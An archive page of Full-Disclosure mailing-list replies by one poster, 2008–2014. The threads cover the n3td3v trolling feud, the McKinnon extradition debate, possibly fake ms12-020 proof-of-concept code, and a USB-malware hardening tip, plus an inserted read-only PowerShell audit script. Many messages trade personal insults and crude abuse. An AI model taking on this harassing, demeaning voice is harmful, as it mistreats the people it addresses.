Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC

2014-03-16 Thread Exibar
LOL. boy oh boy you would have HATED the N3td3v years then...

I'm sure your delete key works doesn't it?


From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of Thomas Williams
Sent: Saturday, March 15, 2014 10:44 AM
To: Mario Vilas
Cc: full-disclosure@lists.grok.org.uk; M Kirschbaum
Subject: Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google
vulnerabilities with PoC

 

I signed onto this mailing list as an interested person in security - not to
see everyone moan. We will all have differences in opinion and we should all
respect that. This goes for everyone and I feel I speak for a lot of people
here, everyone needs to grow up, and shut up.

On 15 Mar 2014, at 13:43, Mario Vilas mvi...@gmail.com wrote:

Sockpuppet much?

On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote:

Gynvael Coldwind,

 

What Alfred has reiterated is that this is a security vulnerability
irrelevantly of whether it qualifies for credit.

It is an unusual one, but still a security vulnerability. Anyone who says
otherwise is blind, has little or no experience in hands on security, or
either has a different agenda.

The obvious here is that Google dismissed it as a non-security issue which I
find rather sad and somewhat ridiculous.

Even if we asked Andrew Tanenbaum about, I suspect his answers wouldn't be
much different.

Rgds,

 

On Saturday, 15 March 2014, 12:45, Gynvael Coldwind gynv...@coldwind.pl
wrote:

Hey,

I think the discussion digressed a little from the topic. Let's try to steer
it back on it.

What would make this a security vulnerability is one of the three standard
outcomes:

- information leak - i.e. leaking sensitive information that you normally do
not have access to
- remote code execution - in this case it would be:
-- XSS - i.e. executing attacker provided JS/etc code in another user's
browser, in the context *of a sensitive, non-sandboxed* domain (e.g.
youtube.com)
-- server-side code execution - i.e. executing attacker provided code on the
youtube servers
- denial of service - I think we all agree this bug doesn't increase the
chance of a DoS; since you upload files that fail to be processed (so the
CPU-consuming re-encoding is never run) I would argue that this decreases
the chance of DoS if anything

Which leaves us with the aforementioned RCE.

I think we all agree that if Mr. Lemonias presents a PoC that uses the
functionality he discovered to, either:

(A) display a standard XSS alert(document.domain) in a sensitive domain
(i.e. *.youtube.com or *.google.com, etc) for a different (test) user

OR

(B) execute code to fetch the standard /etc/passwd file from the youtube
server and send it to him,

then we will be convinced that this is vulnerability and will be satisfied
by the presented proof.

I think that further discussion without this proof is not leading anywhere.

One more note - in the discussion I noticed some arguments were tried to be
justified or backed by saying I am this this and that, and have this many
years of experience, e.g. (the first one I could find):

have worked for Lumension as a security consultant for more than a decade.

Please note, that neither experience, nor job title, proves exploitability
of a *potential* bug. Working exploits do.

That's it from me. I'm looking forward to seeing the RCE exploits (be it
client or server side).

Kind regards,

Gynvael Coldwind

-- 
There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 


Re: [Full-disclosure] ms12-020 PoC

2012-03-16 Thread Exibar
Is that the same code from yesterday?  I thought that code was a fake and 
didn't do anything?

  Anyone confirm this?

 Exibar
Sent via BlackBerry by ATT

-Original Message-
From: kyle kemmerer krkemme...@gmail.com
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 16 Mar 2012 12:01:16 
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] ms12-020 PoC



Re: [Full-disclosure] ms12-020 PoC

2012-03-16 Thread Exibar
Yah, I see the same about the binaryninjas version...  That's the one I'll 
concentrate on..

 Thanks!
Sent via BlackBerry by ATT

-Original Message-
From: Chris L inchcom...@gmail.com
Date: Fri, 16 Mar 2012 11:32:59 
To: exi...@thelair.com
Cc: kyle kemmererkrkemme...@gmail.com; 
full-disclosure-boun...@lists.grok.org.uk; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC

That is the first time I've seen that specific one, so not sure if it is
fake or not. The main one that I saw going around about 12 hours ago was
this one: http://pastebin.com/fFWkezQH and it is the allegedly fake one.
The fact that it was supposedly from s...@fbi.com kind of sent off some
alarm bells right away. That is either someone trying to be funny or trying
to trick some scripties into running something they really shouldn't by
using a recognizable name.

I've seen the BinaryNinja's one being talked about in a few different
places now and the consensus seems to be that it is legit but that at the
moment all it does is blue screen of death any vulnerable Windows machine
that it is used against. I haven't seen any that actually have payloads
yet. That said, I'm just passing on what seems to be the general consensus
I've seen so far. I haven't had the chance to test out any of them yet as I
don't have a spare windows box set up right now. I'm waiting for a working
version to come out before I actually try to go through the shellcode for
any backdoors and test it because who knows what some of these fakes might
REALLY do.

On Fri, Mar 16, 2012 at 10:50 AM, Exibar exi...@thelair.com wrote:

 Is that the same code from yesterday?  I thought that code was a fake and
 didn't do anything?

  Anyone confirm this?

  Exibar
 Sent via BlackBerry by ATT





Re: [Full-disclosure] [inbox] n3td3v's Twitter account hacked

2009-09-20 Thread Exibar
 How would you know the difference between n3td3v spewing his usual crapola
and anything that is now being spewed?

 Exibar

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of The Security
Community
Sent: Saturday, September 19, 2009 12:37 PM
To: Full-Disclosure
Subject: [inbox] [Full-disclosure] n3td3v's Twitter account hacked

Someone evidently hacked into n3td3v's Twitter account and is spewing
nonsense.

http://twitter.com/n3td3v

Maybe it's some sort of botnet C&C account now, I dunno.



Re: [Full-disclosure] Blonde moment for the list administrator

2009-09-04 Thread Exibar
Yah, Blonde moment when he didn't ban the idiot sooner...

 but obviously it hasn't done any good, as you're still here bothering us 
with your useless banter,  aren't you n3td3v of many names

  Exibar


- Original Message - 
From: full-censors...@hushmail.com
To: full-disclosure@lists.grok.org.uk
Sent: Friday, September 04, 2009 9:37 AM
Subject: [Full-disclosure] Blonde moment for the list administrator


i think john was having a blonde moment when he banned n3td3v.

 a momentary lapse in concentration, resulting in an embarrassing
 situation.

 we're supposed to be attracting hackers to the list not banning
 them.

 lawls



Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-19 Thread Exibar
That's a shame if he has bad bones  perhaps if he drank more milk that 
would help.  MY mom always said Drink milk, it builds strong bones.

This statement just confused me, what are you trying to say here?

 let it be now don't pretend of him as a black hat for your 
entertainment

Really, what are you trying to say here?

  Exibar


- Original Message - 
From: someone lawyer some...@lawyer.com
To: Full-disclosure@lists.grok.org.uk
Sent: Wednesday, August 19, 2009 1:00 AM
Subject: Re: [Full-disclosure] False statements made about security 
researcher n3td3v


 List,

 My client setup a mailing list called n3td3v, he used the user n3td3v 
 to spread the name of the user group so people would know it, since then 
 you have ridiculed and tormented him, to the degree that he was so upset 
 he had to be removed from your list.

 There was no need for you to do this to him he is a good guy, he has 
 proved he has no bad bones in his body before he was removed.

 Why when he isn't any longer on your list you continue to want to believe 
 he has bad bones in his body when everyone know he is a good guy? He can 
 get argumentative when he feel need to defend himself when false 
 statements are made, that don't make him bad.

 He a good guy in the information security world, let it be now don't 
 pretend of him as a black hat for your entertainment purposes because 
 people scanning through might not know it as a joke and you could cause 
 damage toward my client.

 some...@lawyer.com

 - Original Message -
 From: valdis.kletni...@vt.edu
 To: Full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] False statements made about security 
 researcher n3td3v
 Date: Tue, 18 Aug 2009 18:24:55 -0400


 On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said:
 What funny about my client be targeted by internet trolls?

 The self-referential aspects of the situation.


Re: [Full-disclosure] Ureleet is the Anti-Sec

2009-08-11 Thread Exibar
oh good Lord, why won't this idiot just up and leave us already, he's
obviously not wanted here   This list was once useful
 
 If you are a real Lawyer, please identify yourself in public, with proper
contact information.
 
  Of course, he's not a real lawyer, nor does he play one on TV.  Hell, he
barely has a 2nd grade command of the English language  He's just yet
another n3td3v troll post. and I fell right into it
 
 
 Exibar


From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of someone
lawyer
Sent: Monday, August 10, 2009 11:49 PM
To: Full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Ureleet is the Anti-Sec


List,

My client has asked me to study the list to make a case against them.

some...@lawyer.com


- Original Message -
From: anti-scared- sheep 
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Ureleet is the Anti-Sec
Date: Mon, 10 Aug 2009 22:25:45 -0400


What's your problem list ?
it's the same kid all the way, the ones who answer to this guy,  should
wonder how dumb he's.
Don't pay attention to him, make a simple filter like *anti.*se.* and get
back to work.

He/They still get attention, and feel like he's/they're important because of
you prick, so shut the hell up.
They/he sucks, OK ?!?
We got rid of n3td3v, plz don't make him feel like he's useful by answering.




2009/8/10 anti...@hushmail.com


Suck a dick bitch.


On Mon, 10 Aug 2009 22:14:13 -0400 someone lawyer
some...@lawyer.com wrote:
List,

No good you part of slanderous.

(T Biehn  Valdis Kletnieks)

some...@lawyer.com

  - Original Message -
  From: valdis.kletni...@vt.edu
  To: full-disclosure@lists.grok.org.uk
  Subject: Re: [Full-disclosure] Ureleet is the Anti-Sec
  Date: Mon, 10 Aug 2009 16:18:03 -0400


  On Mon, 10 Aug 2009 12:07:24 EDT, T Biehn said:
   n3td3v, ureleet, and anti-sec are actually all Hitler, posting after
   being recently unfrozen from cryogenic sleep.

  Conclusion: Keeping your brain on ice for 60 years makes you stupid.
  Hitler was a lot smarter than that. (Crazy, yes, evil, yes - but would he
  have gotten as far as he did if he was only as smart as n3td3v and ureleet?)

Re: [Full-disclosure] [inbox] Re: Marcus J. Ranum on PaulDotCom Episode 133

2008-12-12 Thread Exibar
he's excited because he's mentioned in that episode

  Exibar 

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
valdis.kletni...@vt.edu
Sent: Friday, December 12, 2008 11:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Marcus J. Ranum on PaulDotCom Episode
133

On Sat, 13 Dec 2008 03:01:48 GMT, n3td3v said:
 An interesting episode of PaulDotCom Security Weekly

This was the same PaulDotCom that you were whining about recently?  Let me
guess - this episode is even *more* over the top of the same stuff you
complained about last time... *yawn* Move along, nothing to see.



Re: [Full-disclosure] [inbox] Re: Security predictions for 2009

2008-12-06 Thread Exibar
 I wish I was.  But I DO have quite a few of them left, that is after
that hot babe threw two of them on her boobs and wore them as a bikini top
for a while

  They weren't even for sale, they were GIVING THEM AWAY... a whole roll of
them, must have been over a thousand.  tons of people grabbing a bunch
off the roll  ROFL

  Exibar

-Original Message-
From: n3td3v [mailto:[EMAIL PROTECTED] 
Sent: Saturday, December 06, 2008 7:01 AM
To: Exibar
Subject: [inbox] Re: [Full-disclosure] Security predictions for 2009

Ah, so you were the guy behind the stickers?

On Fri, Dec 5, 2008 at 8:29 PM, Exibar [EMAIL PROTECTED] wrote:
 yes, he should lose the name, and the attitude that he's the last word and
 GOD in Information Security

  agreed, if he goes away for 6 - 12 months, and comes back without the
 attitude and name  there will no longer be N3TD3V SUX stickers at
 'con.

  Exibar

 - Original Message -
 From: [EMAIL PROTECTED]
 To: n3td3v [EMAIL PROTECTED]
 Cc: Exibar [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
 Sent: Friday, December 05, 2008 1:31 PM
 Subject: Re: [Full-disclosure] Security predictions for 2009


 On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
 I'm not a troll I wanted your security predictions, its people like
 you botching the list up not me.

 The basic problem is that you've *been* either a blithering idiot or a
 troll for so long, that even if something sensible *does* get posted from
 n3td3v, people will tend to label it as oh, his trolling has just gotten
 a bit better.

 Your best bet is to just toss that e-mail address, go pursue an outdoor
 hobby for 4 to 6 months, and use a different persona when you return.




Re: [Full-disclosure] Security predictions for 2009

2008-12-05 Thread Exibar
My prediction is that n3td3v will remain and torment us more with 
his/their/its/her unwanted rubbish on this list and will never ever leave as 
was once promised


  why am I feeding the troll?   oh boy...

  Exibar


- Original Message - 
From: n3td3v [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, December 05, 2008 12:24 PM
Subject: [Full-disclosure] Security predictions for 2009


 We here at n3td3v would like to hear your security predictions for 2009.

 Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs
 and web 2.0 worms, that turned out to be utter rubbish (He does work
 for Trend Micro after all), but in true tradition, let's hear some of
 your predictions that might turn out to be bullshit as well.

 n3td3v



Re: [Full-disclosure] Security predictions for 2009

2008-12-05 Thread Exibar
yes, he should lose the name, and the attitude that he's the last word and 
GOD in Information Security

  agreed, if he goes away for 6 - 12 months, and comes back without the 
attitude and name  there will no longer be N3TD3V SUX stickers at 
'con.

  Exibar

- Original Message - 
From: [EMAIL PROTECTED]
To: n3td3v [EMAIL PROTECTED]
Cc: Exibar [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Friday, December 05, 2008 1:31 PM
Subject: Re: [Full-disclosure] Security predictions for 2009


 On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
 I'm not a troll I wanted your security predictions, its people like
 you botching the list up not me.

 The basic problem is that you've *been* either a blithering idiot or a
 troll for so long, that even if something sensible *does* get posted from
 n3td3v, people will tend to label it as oh, his trolling has just gotten
 a bit better.

 Your best bet is to just toss that e-mail address, go pursue an outdoor
 hobby for 4 to 6 months, and use a different persona when you return.
 



Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-22 Thread Exibar
wow, disabling files to run from the root of all drives would never, ever
fly in a corporate environment.  Although I do like the idea on stopping
autorun malware, it would work... but oh the calls to the helpdesk! ;-)  

Simply disabling autorun is a much better solution.

  Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Friday, November 21, 2008 11:58 AM
To: n3td3v
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: [inbox] Re: [Full-disclosure] Fwd: Comment on: USB devices
spreading viruses

USB / FLOPPY are attractive means for virus/worm to propagate. Here is
a workaround to stop a successful infection from happening (well ~99%
of the time at least)

1. if you don't use wscript.exe disable/rename it.

2. start menu > control panel > administrative tools > local security
policy > software restriction policy > additional rules

say if c:\ d:\ and e:\ are your fixed drives then

right click additional rules > create path rule and create path rule
[DISALLOWED AS]

c:\*.*
d:\*.*
e:\*.*

// why let anything to execute from root of fixed drives.

for all other drives (removable/non existing) from a - z do as
a:\
b:\
f:\
g:\
and so on. Why let anything execute from removable drive
unless you are 100% sure the pendrive is clean and from a trusted
source only.

always have file extension and hidden/protected system file to show
by default from folder option.

well this is it. From a personal experience i assure the above should
be the BEST solution for this problem and a extra layer of defense if
AV fails to detect it.

thanks,
-bipin


On 11/21/08, n3td3v [EMAIL PROTECTED] wrote:
 -- Forwarded message --
 From: n3td3v [EMAIL PROTECTED]
 Date: Fri, Nov 21, 2008 at 1:11 AM
 Subject: Comment on: USB devices spreading viruses
 To: n3td3v [EMAIL PROTECTED]


 by n3td3v November 20, 2008 5:08 PM PST

 Meanwhile, the U.S. Department of Defense has temporarily banned the
 use of thumb drives, CDs, and other removable storage devices because
 of the spread of the Agent.bzt virus...

 There is no security through obscurity.


http://news.cnet.com/8618-1009_3-10104496.html?communityId=2114&targetCommunityId=2114&blogId=83&messageId=5043948&tag=mncol;tback




-- 
x-no-archive: yes
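
A read-only audit of the two mitigations weighed in the message above (AutoRun disabled per drive type, and Disallowed path rules on drive roots), added here as an example and not part of any poster's message. It assumes an elevated PowerShell 3+ session and policy stored in the standard HKLM registry locations named in the comments; it looks only for the literal rule strings given in the post and does not evaluate how software restriction policy matches paths.

```powershell
# Added example: read-only audit, changes nothing on the host.
# Assumptions: Windows host, elevated PowerShell 3+ session, machine-wide policy
# stored under HKLM (per-user HKCU values are not checked).

$ExplorerPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
# Level 0 under CodeIdentifiers holds the "Disallowed" software restriction path rules.
$SrpDisallowed  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths'

# NoDriveTypeAutoRun is a bitmask: a set bit disables AutoRun for that drive type.
$DriveTypeBits = [ordered]@{
    'Unknown'   = 0x01
    'Removable' = 0x04
    'Fixed'     = 0x08
    'Network'   = 0x10
    'CD-ROM'    = 0x20
    'RAM disk'  = 0x40
}

function Get-AutoRunState {
    $prop = Get-ItemProperty -Path $ExplorerPolicy -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue
    if ($null -eq $prop) {
        Write-Warning 'NoDriveTypeAutoRun is not set machine-wide; Windows defaults apply.'
        return
    }
    $raw  = $prop.NoDriveTypeAutoRun
    # Normally a DWORD; if it was written as binary, the low byte carries the mask.
    $mask = if ($raw -is [byte[]]) { [int]$raw[0] } else { [int]$raw }
    foreach ($name in $DriveTypeBits.Keys) {
        [pscustomobject]@{
            DriveType = $name
            AutoRun   = if ($mask -band $DriveTypeBits[$name]) { 'disabled' } else { 'ENABLED' }
        }
    }
}

function Get-DisallowedPathRule {
    # Each rule is a {GUID} subkey whose ItemData value holds the path pattern.
    if (-not (Test-Path -Path $SrpDisallowed)) { return }
    Get-ChildItem -Path $SrpDisallowed | ForEach-Object {
        (Get-ItemProperty -Path $_.PSPath).ItemData
    } | Where-Object { $_ }
}

function Test-DriveRootCoverage {
    $rules = @(Get-DisallowedPathRule | ForEach-Object { $_.ToLowerInvariant() })
    # Only drives present right now are listed; the post also adds rules for
    # drive letters that do not exist yet.
    foreach ($drive in [System.IO.DriveInfo]::GetDrives()) {
        $root = $drive.Name.ToLowerInvariant()     # e.g. "c:\"
        # Rule forms from the post: "c:\*.*" for fixed drives, "a:\" for the others.
        $covered = ($rules -contains $root) -or ($rules -contains ($root + '*.*'))
        [pscustomobject]@{
            Drive       = $drive.Name
            Type        = $drive.DriveType
            RootBlocked = $covered
        }
    }
}

Get-AutoRunState       | Format-Table -AutoSize
Test-DriveRootCoverage | Format-Table -AutoSize
```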



Re: [Full-disclosure] [inbox] Re: Windows RPC MS08-067 FAQ document released

2008-10-26 Thread Exibar
Dude, why do you have it in for Gadi so bad?  Oh, I know, it's because he is
making a damn good living at being a REAL security professional and you're
not.  And because he's actually making a real, honest to goodness
contribution to Information security...

  Where are YOUR speaking engagements?  Where is YOUR contribution to
Information Security as a whole?  What are YOUR credentials as a security
professional?  
  I'll make the answer easy for you... THERE AREN'T ANY!!!

  It takes more than calling yourself a security professional to be one.
It takes more than creating a mailing list on Google groups to be a
security professional.
  
  All we see from you is banter and nonsense coming from you, all you do is
bitch, bitch, bitch about everyone else that is actually making a
contribution, a REAL contribution.

  At one point you promised that you would leave this mailing list...  I
think we all wish you would really do it...  Oh yah, and take all your other
email addresses that you have on here and unsubscribe them too... We're all
tired of your nonsense


Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Sunday, October 26, 2008 5:48 AM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Windows RPC MS08-067 FAQ document
released

On Sun, Oct 26, 2008 at 2:50 AM, rholgstad [EMAIL PROTECTED] wrote:
 does securiteam do anything technical

if you think gadi evron is technical you need your head checked.



Re: [Full-disclosure] [inbox] Re: Paul Asadoorian of PaulDotCom Enterprises

2008-10-04 Thread Exibar
 


From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Stephen
Northcutt
Sent: Friday, October 03, 2008 8:43 PM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Paul Asadoorian of PaulDotCom
Enterprises



From: Trevow Andrews [EMAIL PROTECTED]

Date: Wed, Oct 1, 2008 at 11:59 AM

Subject: [Full-disclosure] Paul Asadoorian of PaulDotCom Enterprises

/ Podcast is ridiculous

To: full-disclosure@lists.grok.org.uk

 

= = = Stephen Northcutt here. I tried a couple variations of Trevor Andrews
and did not find such a person registered with the SANS NS2008 conference.  

 

  ROFL!!!  hehe, and I wasn't serious when I mentioned that you're not even
at SANS...  Looks like Northcutt called your bluff what's next, it turns
out that you're really n3t3d3v too  LOL

 

   Exibar 


Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US

2008-09-30 Thread Exibar
 Look, Mckinnon broke into the computer systems.  Under his own admission he
ran scripts to help him do this.  Some of those scripts crashed systems.  He
possibly deleted files and what-not in his travels, either willfully or not,
doesn't really matter.  He loaded software on those systems so he could get
in AGAIN easier...  AND he leaves a note threatening that he will do it
again.

  All this on KNOWN government computer systems.  He intentionally wanted to
get into these systems to look for UFO crap. 

   This goes way beyond just simply leaving a note stating that your door is
unlocked.  This is going into the unlocked car, putting in a remote control
door opener, and threatening to re-enter the car again.

   He knew what he was doing, he knew whose machines he was doing it to, he
was obviously going to keep doing it until caught by the sound of his
message.

   He's a criminal, period.  He should be properly tried in a court of law.
The way the UK and the US law is written, that means extradited to the US
for a trial.

  All the protesting or debating won't change the fact that he's a criminal.
Plain and simple, deal with it  His sentence will be based upon what
comes up in court, and it hardly ever is the maximum.

  Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Monday, September 29, 2008 7:42 PM
To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to,
hacker's,extradition to US

nobody could be so stupid to leave their car door unlocked, ::blush::
the u.s military did, then gary mckinnon left a note on their wind
screen wiper to say, look guys, you left your door unlocked, maybe you
should fix it.

the u.s military come back to the car, and claim the inside of the car
has been damaged, but no proof it was gary mckinnon who did it, when
there were plenty other people who could have walked past the same car
and done something to it.

the u.s decide they can't prove it was gary mckinnon who did the
damage, because all they've got is the note on the wind screen wiper
saying, you left your door unlocked, maybe you should fix it.

next we know, the kid is being extradited to the u.s on charges of
carrying out the biggest car crime of all time, and they change the
law to say, actually we don't need proof you caused the damage or that
any damage existed, we're blaming you anyway.

by the way, we're giving you 60 years and you're never going to see
your friends and family ever again.

On Mon, Sep 29, 2008 at 10:57 PM, Exibar [EMAIL PROTECTED] wrote:
  So you guys are saying that if I forget my keys in my car and the door
 unlocked that it's not a crime to steal my car?
  It's not a crime to NOT lock your house, but it's still a crime to open
 that door and take that big screen tv if you're not the owner...

  Doesn't matter if he willfully caused damage or not, he still caused that
 damage, he's still a criminal.  The details will have to come out in court,
 and they will.  Either in the US or in the UK, doesn't matter...

  He's a criminal, period... He should be treated as such...

  Exibar

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
 Sent: Monday, September 29, 2008 11:24 AM
 To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED]
 Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to,
 hacker's,extradition to US

 I just think someone from the military should be in the dock as
 well!!! This wasn't a one sided security incident, sloppy admins were
 involved in the 'threat to national security' that Gary Mckinnon
 supposedly posed.

 The passwords on the systems weren't set, if it wasn't Gary Mckinnon
 it was going to be some other script kid who got in.

 I don't know why the military are making a big deal about what
 happened, when ultimately its their I.T security staff who were the
 main culprits of blame.

 According to Gary Mckinnon, there were lots of script kids in the
 systems at the same time as him, they just decided to pick him out of
 the crowd to make an example of the activity that was going on.

 This should be a non-issue that should have been dealt with internally
 in the military, the I.T security staff blamed and the script kids
 left to go on their humble way.

 When the way of intrusion is this lame, and its obvious the blame is
 on the I.T security staff, then I don't think they should waste
 everyone's time herding one of the script kid across the atlantic,
 just to keep America's nation pride in tact.

 Geez fucking christ, it was totally the military's fault, there is no
 get out clause.

 On Mon, Sep 29, 2008 at 4:00 PM, Kyrian [EMAIL PROTECTED] wrote:
 Folks,

 Thanks to Exibar for the (likely) clarification. No issue in converting
 from metric, incidentally ;-)

 I will check out the links you provided this evening and make up my own
 mind

Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US

2008-09-30 Thread Exibar
excuse me?  Your attempt at insults is pointed wrongly.
 
  I've read the legal brief on his case, the UK documents on his case too,
he's ADMITTED guilt.  In my book that's enough to call him a criminal, he
should be arrested and tried in a court of law to determine if that is a
fact or not.  It's up to his accusers to prove his guilt.  He is not
actually guilty until he is found to be guilty in the court of law.  If they
cannot prove he is guilty, he must walk a free man.  Not to difficult to
prove guilt when the accuser admits to what he's done  

   He is completely innocent until found guilty... at least in the US, UK,
and even Australia that is the way things are.  Lets see what the Chinese
would do to him if he did the same thing over there than over here.
 
  oh, to answer your question, YES, I'm an American, and proud of it 
 
  Exibar

  _  

From: Noel Butler [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, September 30, 2008 5:28 PM
To: Exibar
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to,hacker's,
extradition to US



On Wed, 2008-10-01 at 00:03, Exibar wrote: 

 Look, Mckinnon broke into the computer systems.  Under his own admission he
ran scripts to help him do this.  Some of those scripts crashed systems.  He
possibly deleted files and what-not in his travels, either willfully or not,
doesn't really matter.  He loaded software on those systems so he could get
in AGAIN easier...  AND he leaves a note threatening that he will do it
again.

  All this on KNOWN government computer systems.  He intentionally wanted to
get into these systems to look for UFO crap.

   This goes way beyond just simply leaving a note stating that your door is
unlocked.  This is going into the unlocked car, putting in a remote control
door opener, and threatening to re-enter the car again.

   He knew what he was doing, he knew whose machines he was doing it to, he
was obviously going to keep doing it until caught by the sound of his
message.

   He's a criminal, period.  He should be properly tried in a court of law.
The way the UK and the US law is written, that means extradited to the US
for a trial.

  All the protesting or debating won't change the fact that he's a criminal.
Plain and simple, deal with it  His sentence will be based upon what
comes up in court, and it hardly ever is the maximum.




I'm sorry, are you American? Are you a typical American?

If so, you have just demonstrated why he should not be extradited, as you,
as a typical American have him decided GUILTY already without seeing and
hearing all the ACTUAL  evidence. not just the rhetoric the politicians want
the media to tell you about, so he has no chance of fair trial.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [inbox] Re: Supporters urge haltto, hacker's, extradition to US

2008-09-30 Thread Exibar
 
 tons of dribble snipped 




   He is completely innocent until found guilty... at least in the US, UK,
and even Australia that is the way things are.  


You seem to be contradicting yourself here, but maybe a little bit of light
is getting in. 
 
  Nope, he is completely innocent until he is FOUND guilty by a court of
law.  Right now, there is fair evidence to bring him in for the crime
committed.  He is the prime suspect at this time for that crime.  The
details of his crime, his testimony, his accuser's testimony, and evidence
both against and for him will be submitted.  Based upon those facts that are
presented he will either be found guilty or not guilty.  If he's found
guilty, he will be sentenced.  That's the way the laws of our countries
work.


Lets see what the Chinese would do to him if he did the same thing over there
than over here. 


China has changed a lot in recent times, I think you'd find he'd get a fair
trial, and you wouldn't have ministers there saying he needs to fry  
 
   sure, with a huge difference...  During trial, you have to prove yourself
innocent.  HUGE difference there   Oh and he'd be put to death in China
for crimes against the state.  So he'd literally be fighting for his life
during a trial in China.
 
  End of conversation... this is getting fruitless... lets all just sit back
and watch what happens
 
  Exibar



Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US

2008-09-29 Thread Exibar
 So you guys are saying that if I forget my keys in my car and the door
unlocked that it's not a crime to steal my car?  
  It's not a crime to NOT lock your house, but it's still a crime to open
that door and take that big screen tv if you're not the owner...

  Doesn't matter if he willfully caused damage or not, he still caused that
damage, he's still a criminal.  The details will have to come out in court,
and they will.  Either in the US or in the UK, doesn't matter...

  He's a criminal, period... He should be treated as such...

  Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Monday, September 29, 2008 11:24 AM
To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED]
Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to,
hacker's,extradition to US

I just think someone from the military should be in the dock as
well!!! This wasn't a one sided security incident, sloppy admins were
involved in the 'threat to national security' that Gary Mckinnon
supposedly posed.

The passwords on the systems weren't set, if it wasn't Gary Mckinnon
it was going to be some other script kid who got in.

I don't know why the military are making a big deal about what
happened, when ultimately it's their I.T security staff who were the
main culprits of blame.

According to Gary Mckinnon, there were lots of script kids in the
systems at the same time as him, they just decided to pick him out of
the crowd to make an example of the activity that was going on.

This should be a non-issue that should have been dealt with internally
in the military, the I.T security staff blamed and the script kids
left to go on their humble way.

When the way of intrusion is this lame, and it's obvious the blame is
on the I.T security staff, then I don't think they should waste
everyone's time herding one of the script kids across the Atlantic,
just to keep America's national pride intact.

Geez fucking christ, it was totally the military's fault, there is no
get out clause.

On Mon, Sep 29, 2008 at 4:00 PM, Kyrian [EMAIL PROTECTED] wrote:
 Folks,

 Thanks to Exibar for the (likely) clarification. No issue in converting
 from metric, incidentally ;-)

 I will check out the links you provided this evening and make up my own
mind.




Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's, extradition to US

2008-09-28 Thread Exibar
 McKinnon did cause damage:

The charges include one incident - shortly after the attacks on September
11 2001 - which brought down a network of 300 computers at the Earle naval
weapons station. Another raid apparently left 2,000 government machines in
Washington inoperable.
http://www.guardian.co.uk/technology/2006/apr/28/hacking.security

  A message left by him on a system:

As part of his quest he left this message on an Army computer in 2002:
U.S. foreign policy is akin to government-sponsored terrorism these
days It was not a mistake that there was a huge security stand down on
September 11 last year ... I am SOLO. I will continue to disrupt at the
highest levels.
http://blog.wired.com/27bstroke6/2008/08/uk-hacker-gary.html  (and many
other sources with the same message)

